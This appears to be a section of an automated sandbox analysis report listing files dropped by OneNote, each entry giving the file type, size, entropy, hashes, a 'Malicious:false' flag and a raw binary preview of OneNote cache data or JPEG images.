                                                                                                                                                                                                              SHA-512:19D3A5AB0EB0B86E78B07EB90940B519F5DA01E4361CB3687B7188559A4065BE271D65FFBB14890C70DD1F8D50E29FA0C34CF3AFDD1CE81B4282EE0F3889082D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>......."...v....... ..."......>.......r...v...>...@....!...........................................................................................................................................I.......I.qk..B.....LZ.\(......\({....4<.=.C...\({....4<.=.C...\(...m.....k..F.....I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'...............(.:..#...,.vb....N...^................x=.x..K.....r.............r...............................z....I.qk..B.....LZ..............(.:..#...,.vb..................................\(......\(......\(.........................................\(......\({....4<.=.C.....8.....m.....k..F.2................................I................................\(j.....\(T&|...\(......\(..8.............Y...........$.7........!....z...,4. ............................"......$...7...............T.u.e.s.d.a.y.,. .J.u.l.y. .2.8.,.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59707
                                                                                                                                                                                                              Entropy (8bit):7.858445368171059
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                                                                                                                              MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                                                                                                                              SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                                                                                                                              SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                                                                                                                              SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.8618169795163952
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Kqs/BV5CRt1K1597aBUH8V7hcWubJA1sDsc6HJ7p5XDRhRlbD:GpvCBKR7IV2OmYc6HJLDRhRlf
                                                                                                                                                                                                              MD5:4F4105988FD4E6987B48D43CE7ED50FF
                                                                                                                                                                                                              SHA1:66F10D7B89EA09E19ACC8145D5DAE00B21F750DE
                                                                                                                                                                                                              SHA-256:CADD5B9155DAA75F4FAA08A9FAD351059DDB33BD24088B76F24A18B8D76C1109
                                                                                                                                                                                                              SHA-512:8F60C19A816E3D320FBD6CE667C830AC86FA9FD2D4C90936D4430FF9F1DF9A3AE13FF88024B33F037E725B8EAA152AC789835A46491C9F5E3A84E6CB97386F24
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......H ...!..2...>...R...,...v.......@.... ...........................................................................................................................................I.......I.qk..B.....LZ..}.<.....}..=..,E.../...}..=..,E.../...}..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............|.........^/......N...^.....................I.xA=.T..............P...............................4....I.qk..B.....LZ.............|.........^/.....................................}.......}.......}...........................................}j......}T.q....}.......}..]....}H......} .@....}$......}..d...............;........4...4...4..............z.......R......................7............S.y.m.b.o.l.......................'..}%..}..z...,4. .......$>........4..p..7........................................;........4...4...4
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27862
                                                                                                                                                                                                              Entropy (8bit):7.238903610770013
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                              MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                              SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                              SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                                                                                              SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):5.313488404618078
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gO8AWligq7YbZ1LbstwhyZGD20L5RSFoGSXgDbR0lw/SkxZ8EaSDrRF:aNPPWtMM3D
                                                                                                                                                                                                              MD5:E0ED496917C427B241E471C3852B9638
                                                                                                                                                                                                              SHA1:228278B852E0822B5F771FE270FEB86CF3F6C053
                                                                                                                                                                                                              SHA-256:E9F6F8DCB10B39263D00F9D85AFB616B79A9B8BF1C0880A00A6F1F4922AB6DD2
                                                                                                                                                                                                              SHA-512:2B730D2BF756CA7A732559606171931823C655CECF8611A49E0DB7401A8BFA22891DEC10384F8F80CE54BE52D3C408D293A6720F2230728B8B9F4CF7BE6E1A79
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:x.......(...........@...0@... .. L......x...................\...`J... ...J..............................................................................x........................J... ..@K...............}.......}.....G....q4...................i.........,.8.\%..........P.......CT:.]....w..w...,*AT%.5.w.......................................................................}.T.........k.....X.K...............................f...................0...........e....4.........................Ap.H..@.AFJy.k.....(.....x.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .O.r.a.n.g.e...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...2...0.0.0.2.4...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e.......#.............i................6I.D.......2...........`...f.......6........}......ww..(t..'Q.... .a.7...............0...........e....4.........................A..:4E.2..p1......(...`.i.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .Y.e.l.l.o.w...j...P.a.g.e.L.o.c.I.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.097540548144835
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:b0sQMgaj0NAtbtQEau87XHnO9Ha1hv7TolrdHrudI40dX9A8IXFWPes8IK36S:Qs30NAPQEau6XHO9Ev7TIRLuJ00v
                                                                                                                                                                                                              MD5:CFB59791792605536D8662E2B6BF70EA
                                                                                                                                                                                                              SHA1:3235B61AF6783CD2EA7A91F738C86177ADE8A560
                                                                                                                                                                                                              SHA-256:9A4752E696341253A33D8594065E4D638694758179776A6CA304F4E1E3196671
                                                                                                                                                                                                              SHA-512:94472FE91180C19784477C53FAF718DA3C073FE2E484BDA2F1947823326F764747970A8627AD3D50373549725271036ECE07ADE9287EB085F024E8B89775ACB7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....... ...v....................................................?....?.............................................................................2...>.......|...v...H............................I.......I.qk..B.....LZD.......D..cv...O?..`..D..cv...O?..`..D....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............[?.mT3...."..,....N...^................7>l.P.I...f.Y..........f........................................I.qk..B.....LZ.............[?.mT3...."..,.........[?.mT3...."..,.........D.......D.......D...........................................D..j....D..T.]..D.......D....B..D..H....D....B..D....>.)D....J...................;........4...4...4.."..............D...D...D....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........D.......D......#D..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.096913784771266
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:9s3PWsAdEEAXgd9KsTGRyQeDq/D0DLyyM:9s3PWsKRAX09KsaRyQeDoD0DGyM
                                                                                                                                                                                                              MD5:98FA48A6AE40FA928D250663F42DE56C
                                                                                                                                                                                                              SHA1:3EE92DDF24B4A2332A8CBD7CB1131C1046872368
                                                                                                                                                                                                              SHA-256:D18004A609AB97D5607900CC9A510AD898744C6A2072FFA04B4A37E4E04C7D34
                                                                                                                                                                                                              SHA-512:D39D821375B186148133BE61C16CAD387F18910CF13E9B4D2C3A8CC4B351080C6530AC3EB48325B6BCDD3C0DDFD14F2B6B307DAD67D74CFD7B27BCBCB6318FC4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ..[.......[.J...9h...v@..[.J...9h...v@..[..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................~u...o;.......N...^....................MH....=r.@........f........................................I.qk..B.....LZ................~u...o;...............~u...o;..............[.......[.......[...........................................[j......[T.]....[.......[..B....[H......[..B....[..>.)..[..J...................;........4...4...4.."................[...[...[..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........[.......[....#..[............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.067311940385233
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:lsETwUisKptebgE3p58XL89Q6CATovrd6rZhI0dXITbK4Ag:lsytKpbE38XI9Q6CATqRiZ1SA
                                                                                                                                                                                                              MD5:78F06737E46EF47C689105450D544D4F
                                                                                                                                                                                                              SHA1:81189E9CF59E7DAD97EF68B77ABA8DDE95AC5C15
                                                                                                                                                                                                              SHA-256:C705B1DFB8A99EA2C7F7825EA750775F9CC74BB25E9A999D567DA8F0CF966E49
                                                                                                                                                                                                              SHA-512:8D9692EC1830B032C2CE5A7C422B039BB454E31349498D7F5A0628C040B7463AE61BF3E99247935608B6A3015C35FA0D11F3D08DA61CEE55F1411DCC74E5C39D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ............e...=.$.(.......e...=.$.(........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................B.F...J./J.......N...^...............I......F..{.\(EG........f........................................I.qk..B.....LZ...............B.F...J./J..............B.F...J./J...........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.045779158577508
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:TxPstc3iwsMZtw0El2QXjQ9SaGSToxTrdnrE/IGdX6zWeBBSg:pstpwsMZjEcQXjQ9SaGST0RrosBY
                                                                                                                                                                                                              MD5:3C36EEBE9A13C8F0B8A3DB1B7ED74D15
                                                                                                                                                                                                              SHA1:2B8FE8AC754311EE5C0CFCA23780E0084971F58C
                                                                                                                                                                                                              SHA-256:1D8B6B0A46C2C4B465914657723851A3A5AFDE74F3928A310769671A54FA9005
                                                                                                                                                                                                              SHA-512:854A745B855572252935A505EC74300B2113DF0F37BF55024C6A15B0002EB2DB5C055EC883872EF5A89634953FD0841F8AFB0D2C26B3E7ADF4AB9860621BFF40
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZz.......z...j.R.&.9....z...j.R.&.9....z....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............4`........:.um....N...^.................-^..M.b...\?.........f........................................I.qk..B.....LZ..............4`........:.um..........4`........:.um.........z.......z.......z...........................................z..j....z..T.]..z.......z...B..z..H....z....B..z....>.)z....J...................;........4...4...4.."..............z...z...z....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........z.......z......#z..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.0873755583097
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:N7srUf+ZtbEHKX7U9AF17jTrRysnmfFa6fCVIRb:9srU2ZGHKXI9g1H3RyqmfFa6f4IR
                                                                                                                                                                                                              MD5:AA4974001C59F4B24FB16296594B303B
                                                                                                                                                                                                              SHA1:E3F9BF69487D764FA360227BC8E0E7EB6FEABCDF
                                                                                                                                                                                                              SHA-256:27BD55A2D5660852D877D64066162529A6858B2B81337F13359E3C953BB9BA57
                                                                                                                                                                                                              SHA-512:73C17CD03161D8CF79F5B9C6DA2D6ABE4EB19418BFD1FF738677EE3F4DBFEFD4D0C126F6DCA7747C93F4D92DF39431A5DAEE43CC51436F69B1C52190E855732B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ..Q.......Q_....5.y..X.d..Q_....5.y..X.d..Q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............;DI.....<#.b.x.n....N...^...............E1!2.1.J...............f........................................I.qk..B.....LZ............;DI.....<#.b.x.n........;DI.....<#.b.x.n...........Q.......Q.......Q...........................................Qj......QT.]....Q.......Q..B....QH......Q..B....Q..>.)..Q..J...................;........4...4...4.."................Q...Q...Q..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........Q.......Q....#..Q............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.031390603368818
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Ym2s6VNknX+tqKEEDX09TxThToQrdDr6IddXz9RIOR:z2s1nuTEaX09TNhTFRPp5
                                                                                                                                                                                                              MD5:70965B310E5A0939246501A791892446
                                                                                                                                                                                                              SHA1:50FD4FB24E9FF192FD11E88FC36FC03AB8CDF66B
                                                                                                                                                                                                              SHA-256:833A7A76B72D6FF7FBD4397F4203A47AD39AF6CCB853DAE7B4C5B720C7248689
                                                                                                                                                                                                              SHA-512:57FDE867378A06D426EBBA04B24B891CB8C2DF834251646B4632A617A8E5C83B7D0CCD8D7E0A5D2DA2414A2072A1A52904395CA1D3C418BF9C9711DBAB81D544
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ..e.......eb.se..&...r.L..eb.se..&...r.L..e..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............!..;...-U9.........N...^...................= !O....*..^........f........................................I.qk..B.....LZ.............!..;...-U9..............!..;...-U9................e.......e.......e...........................................ej......eT.]....e.......e..B....eH......e..B....e..>.)..e..J...................;........4...4...4.."................e...e...e..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........e.......e....#..e............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.079367353466974
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:1HQsC7b4HkOMzEYTXk99AT+R2HkwzrzqXztzEzrCBzOz:1HQstkOzYTXk99AyR2HkwnyZ4nCy
                                                                                                                                                                                                              MD5:61A04A3AF2035B6E6D820C2AD33F83A0
                                                                                                                                                                                                              SHA1:72178E0EC38F583EA4380155B307B1DB402F5B2E
                                                                                                                                                                                                              SHA-256:115BFE2901CC4C217ADE2200A8B77234CBAA9B22F36CFB3832D3984D61277E81
                                                                                                                                                                                                              SHA-512:3E3C2E6E7F562E47F14889C9A16D4B6064DC241F37A2FE2DBDBD98F5D853AE98CF383153E4341B3B50AA8171A40A248BAC65F9F0B2EEDB4151616A72A0BFB347
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ,x......,x......8g..m.,x......8g..m.,x...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............l..`Rh...:..2.....N...^...............g_2.^..N.wJ............f........................................I.qk..B.....LZ.............l..`Rh...:..2..........l..`Rh...:..2..........,x......,x......,x..........................................,x.j....,x.T.]..,x......,x...B..,x.H....,x...B..,x...>.),x...J...................;........4...4...4.."..............,x..,x..,x...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........,x......,x.....#,x.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.113495174180385
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YMyslZnVTAz6ltlAL6En6rVX49J7AKToRCrdvlxroID5DdXv1RdRh:SsFAz+XAeEgX49J7hTNRHd5Dl
                                                                                                                                                                                                              MD5:6490B5C6D692CFBCBD11A3F382F19AD1
                                                                                                                                                                                                              SHA1:5322FA1E80166883845FF9D7AEB0F082D9767ABB
                                                                                                                                                                                                              SHA-256:6876C64F06852696E5899972713DBB578E04D911AAFF854FE69A449AB63217E7
                                                                                                                                                                                                              SHA-512:483BCD9F39B51B7499B5DA896CB89D61673290F9C7DC4267EFD0E0C89EA1D7DECAD29FC73E595F8F26B3C6374BCD9F19F4838879B3C06911C1112482EB61241F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ............../.:w.E"........./.:w.E"........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............#..3..6...=T.....N...^...............+h.....D.Z.....g........f........................................I.qk..B.....LZ.............#..3..6...=T..........#..3..6...=T.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.079362547805339
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YKwsM5Dq95Yx5pcwXHt9H4l1KEXgZUX49XpxToUrdPrBI9dXDJRM5Yx5/5Tdk5HG:KskXHf4lcEXgqX495xTBRjAz3p
                                                                                                                                                                                                              MD5:FD4FD279D8C0FB0874E40FA59BC7F45E
                                                                                                                                                                                                              SHA1:4409F7EA454561324A5F076B4D1222DE7A609DFC
                                                                                                                                                                                                              SHA-256:A11750072EB6D3D6F754DFAA274B35EDF6D9099804FE1290361C4831BA2E4EAA
                                                                                                                                                                                                              SHA-512:ADA6A15D9C60A6FCF497529B5DAED0FEAAAF7C46C3E65B5E99A821D6B1D7414447D0F633A83077638368BB4C8A9E6CCBE1B9B742AE8CA5C5A8DC734B0FBDBB97
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.B.......B....9......$4>.B....9......$4>.B...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............i......'.1CZ.......N...^...............+L.F..7O..0...........f........................................I.qk..B.....LZ............i......'.1CZ...........i......'.1CZ.............B.......B.......B...........................................B.j.....B.T.]...B.......B...B...B.H.....B...B...B...>.).B...J...................;........4...4...4.."...............B...B...B...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........B.......B.....#.B.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.0663479467954975
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YnBs97+TKubnui/SfteiE8HWXAQW9t3JFDTourdQrWIfdXRBRBu/z3Zr97Sll:ys9cnui/Sf3EXXAh9FDTPRI3GK
                                                                                                                                                                                                              MD5:0BD5F6A9C24A40252A7FA98CBF9DBF51
                                                                                                                                                                                                              SHA1:B396239FE6E478633409802D1D94F1984B09DC3C
                                                                                                                                                                                                              SHA-256:3318A07553FBB332BFC60588D2F933EDCCEED5BCA30BF4398EFBF47D44FF7305
                                                                                                                                                                                                              SHA-512:5D557C5F060EB0BE6A55D3FEB25C0C43E77CDE1394D264AC40A61B0BD8D2ED4664155759FE704C309F6D2960F17F7394842B267890E7E6D2BBDEC0DF9E44FB46
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ................ ..%...=........ ..%...=.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............7.U..<#...l.....N...^................(..m,Y@.*J...K.........f........................................I.qk..B.....LZ..............7.U..<#...l...........7.U..<#...l.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.050222056113385
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Yu+s/LOx5DRO+tNMyELh9JXA9FOgnTosxrdP7rUIbdXptRTRlt:is6RO+rEfJXA9RnTbRf9T
                                                                                                                                                                                                              MD5:1324C09667FFD81E169B646897883DC3
                                                                                                                                                                                                              SHA1:F11FBE8EA96809E4670DE044D4B72C3F005232E3
                                                                                                                                                                                                              SHA-256:D4AC596F5867E0579A8E5781721A1FA2EBCD3E7D6BEDA42A0AF084FE21EC1C49
                                                                                                                                                                                                              SHA-512:C9884655B9F5B73CF02467863B25DB32218D4BAA847D0D6C03516C54BE373CCACE1D8CAE6E5C773FA80247508E8F845BB9B7949759769BA0EABAA08B6FD65846
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ.2g......2gW..V.5...'|.I.2gW..V.5...'|.I.2g..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............go#].....J?...>.....N...^.....................YK...w.;F.........f........................................I.qk..B.....LZ............go#].....J?...>.........go#].....J?...>...........2g......2g......2g..........................................2gj.....2gT.]...2g......2g..B...2gH.....2g..B...2g..>.).2g..J...................;........4...4...4.."...............2g..2g..2g..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........2g......2g....#.2g............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.065386888392586
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:uslgyg6g2rW/EF/cXPc9PHBRTVReDPg6gkegPg9gz:uslgyg6g2rRNcXPc9/BRpReDPg6gkegN
                                                                                                                                                                                                              MD5:F5BCA56A74082ADA3AD4E12DE3210C86
                                                                                                                                                                                                              SHA1:2CDDDF965F48E7B07E4A7F04800A09355047A8AC
                                                                                                                                                                                                              SHA-256:27B3D8EE0A95FE65DD60878FEA812623E59082605D8EC25036E01E8535AF2920
                                                                                                                                                                                                              SHA-512:8B62E9190DC72E27130ED205662D27B64AA4ABC8E5C9FFD701615A619CEB857CD9BA7E2786F94A93F2D08B05584C5B0FD393568BC0FC50DBD6999B773DDB6CA6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ9.......9...p.......?5.9...p.......?5.9....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............#.y.W...?..(&.ba....N...^.................<).b L.T.............f........................................I.qk..B.....LZ............#.y.W...?..(&.ba........#.y.W...?..(&.ba.........9.......9.......9...........................................9..j....9..T.]..9.......9...B..9..H....9....B..9....>.)9....J...................;........4...4...4.."..............9...9...9....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........9.......9......#9..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.088897307366094
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Bsm/9Pz9WlFiEHX09erT/RfH72FAD96vyGlj8:Bsm/9Pz9sFPHX09erDRv72F096vycY
                                                                                                                                                                                                              MD5:9C52D1E644E4A5166D0EA4561C51CD74
                                                                                                                                                                                                              SHA1:86A782AE9F4507C55B46CEE066E2F92D40EF2B16
                                                                                                                                                                                                              SHA-256:C673C7583BFD818CBF72E34DB3CC6061427F8255216F2640EAB982D8A92B7D5B
                                                                                                                                                                                                              SHA-512:2B0781DC568CA1B3DDF0E57C2C06EE138ECECD04A4B5FAADABA9F47170D86E4EFD9C247FD172CEE72A32A32D81D246AD2E827AE2469D261DEC08FAA6CF448688
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ............H=..t...Xi.....H=..t...Xi......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'....................|F...>w....N...^....................M.B.=.]..T.........f........................................I.qk..B.....LZ...................|F...>w...............|F...>w........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
